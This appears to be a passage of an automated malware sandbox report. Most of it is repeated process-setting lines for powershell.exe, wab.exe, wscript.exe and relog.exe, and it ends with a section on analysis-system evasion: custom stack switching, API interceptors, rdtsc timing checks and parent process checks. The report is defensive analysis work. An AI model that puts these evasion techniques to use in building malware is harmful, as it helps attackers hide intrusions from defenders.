Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API/Special instruction interceptor: Address: 781E158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API/Special instruction interceptor: Address: 48B4133
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 26_2_21CFD1C0 rdtsc

26_2_21CFD1C0

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

